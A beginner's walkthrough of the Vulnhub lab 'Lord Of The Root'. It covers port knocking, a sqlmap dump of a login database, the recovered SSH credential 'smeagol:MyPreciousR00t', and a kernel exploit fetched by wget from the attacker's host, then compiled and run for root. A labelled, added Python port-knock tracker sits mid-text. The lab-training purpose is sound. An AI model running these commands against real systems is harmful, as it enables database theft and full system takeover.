Lord Of The Root: 1.0.1 Vulnhub Walkthrough


Hello everyone, in this blog I am going to post a walkthrough of Lord Of The Root 1.0.1.

This machine is for beginners.

Let’s start.

Target IP- 192.168.43.159

Attacker IP- 192.168.43.139

Let’s scan the target IP.

nmap -sC -sV -p- -Pn 192.168.43.159

There is only 1 port open.

22- ssh

I tried connecting to ssh.

ssh 192.168.43.159

I tried a few default passwords but it didn’t work.

When you look at it carefully, the banner says “knock Friend To Enter” and under that it says “Easy as 1,2,3”.

Later, I got to know that there is something called “Port Knocking”.

Click here to know about port knocking.

So, Let’s knock ports 1,2,3.

nmap -sT -r -p 1,2,3 192.168.43.159

-sT : Connect scan

-r : Scan ports consecutively – don’t randomize
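
How a knock daemon might track this sequence, as an added Python example (not from the original post and not any real daemon's code); the 10-second window, the class and function names, and the sample events are assumptions. It shows why the in-order `-r` option matters: shuffled or slow knocks never complete the sequence.

```python
from dataclasses import dataclass, field

KNOCK_SEQUENCE = (1, 2, 3)  # ports from the banner hint "Easy as 1,2,3"
SEQ_TIMEOUT = 10.0          # assumed: seconds allowed for the whole sequence

@dataclass
class KnockTracker:
    """Hypothetical per-source knock state machine (not knockd's own code)."""
    sequence: tuple = KNOCK_SEQUENCE
    timeout: float = SEQ_TIMEOUT
    progress: dict = field(default_factory=dict)  # src_ip -> (next index, start time)
    allowed: set = field(default_factory=set)     # sources that completed the knock

    def observe(self, src_ip, dst_port, ts):
        """Feed one connection attempt; return True once src_ip is allowed."""
        if src_ip in self.allowed:
            return True
        idx, started = self.progress.get(src_ip, (0, ts))
        if idx == 0 or ts - started > self.timeout:
            idx, started = 0, ts                  # fresh start or expired window
        if dst_port == self.sequence[idx]:
            idx += 1
            if idx == len(self.sequence):
                self.allowed.add(src_ip)
                self.progress.pop(src_ip, None)
                return True
        else:
            # A wrong port resets progress; it may itself be a new first knock.
            idx, started = (1 if dst_port == self.sequence[0] else 0), ts
        self.progress[src_ip] = (idx, started)
        return False

# Constructed sample events: (source IP, destination port, timestamp in seconds).
SAMPLE_EVENTS = [
    ("192.168.43.139", 1, 0.0), ("192.168.43.139", 2, 0.1), ("192.168.43.139", 3, 0.2),
    ("192.0.2.10", 2, 1.0), ("192.0.2.10", 1, 1.1), ("192.0.2.10", 3, 1.2),   # shuffled
    ("192.0.2.20", 1, 2.0), ("192.0.2.20", 2, 7.0), ("192.0.2.20", 3, 22.0),  # too slow
]

def replay(events):
    """Run events through a fresh tracker and return the set of allowed sources."""
    tracker = KnockTracker()
    for src_ip, dst_port, ts in events:
        tracker.observe(src_ip, dst_port, ts)
    return tracker.allowed

if __name__ == "__main__":
    print(sorted(replay(SAMPLE_EVENTS)))
```

The tracker only sees destination ports, so anyone who learns the sequence (here it is hinted in the SSH banner) passes it; knocking hides a service but does not authenticate the client.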

Let’s scan the target again.

nmap -sS -A -p- 192.168.43.159

OK, now we can see 1 more port got opened and a website is running on it.

1337- http

It’s an image. I checked the page source but I didn’t find anything.

So, I ran Nikto.

nikto -h http://192.168.43.159:1337

I found a directory /images/.

So, we got image files.

I checked every file but didn’t get anything.

I thought of checking /robots.txt.

It has an image.

I checked the page source, and I found a Base64-encoded string.

I decoded it twice.

So, we got a directory /978345210/index.php.

We got a login page. I tried a few usernames and passwords but I couldn’t log in.

I used SQLMAP.

sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms --dbs --risk=3 --level=5 --threads=4 --batch

So, there are 4 databases available.

Next, I checked the tables in the Webapp database.

sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp --tables

We got the table Users.

Let’s check for columns.

sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp -T Users --columns

We got id, password and username.

Let’s dump them.

sqlmap -u http://192.168.43.159:1337/978345210/index.php --forms -D Webapp -T Users -C id,password,username --dump

OK, we got some usernames and passwords.

I tried to log in on the webpage but failed.

As SSH is running, I tried to log in there.

Only one username and password worked, i.e.

smeagol:MyPreciousR00t

ssh smeagol@192.168.43.159

I got the shell.

Now, I checked for the Linux version.

uname -a

I checked if any exploit was available for that version and found it.

I downloaded the exploit on my Kali machine and started an HTTP server.

python -m SimpleHTTPServer 8080

After this I moved into the /tmp folder in the shell and downloaded the exploit using wget.

I compiled and executed it.

cd /tmp

wget http://192.168.43.139:8080/39166.c

gcc 39166.c -o exploit

./exploit

Here, I got ROOT!!!

Writer: Anudeep is a Cyber Security Intern at Azure Skynet Solutions Pvt Ltd. You can contact him here.
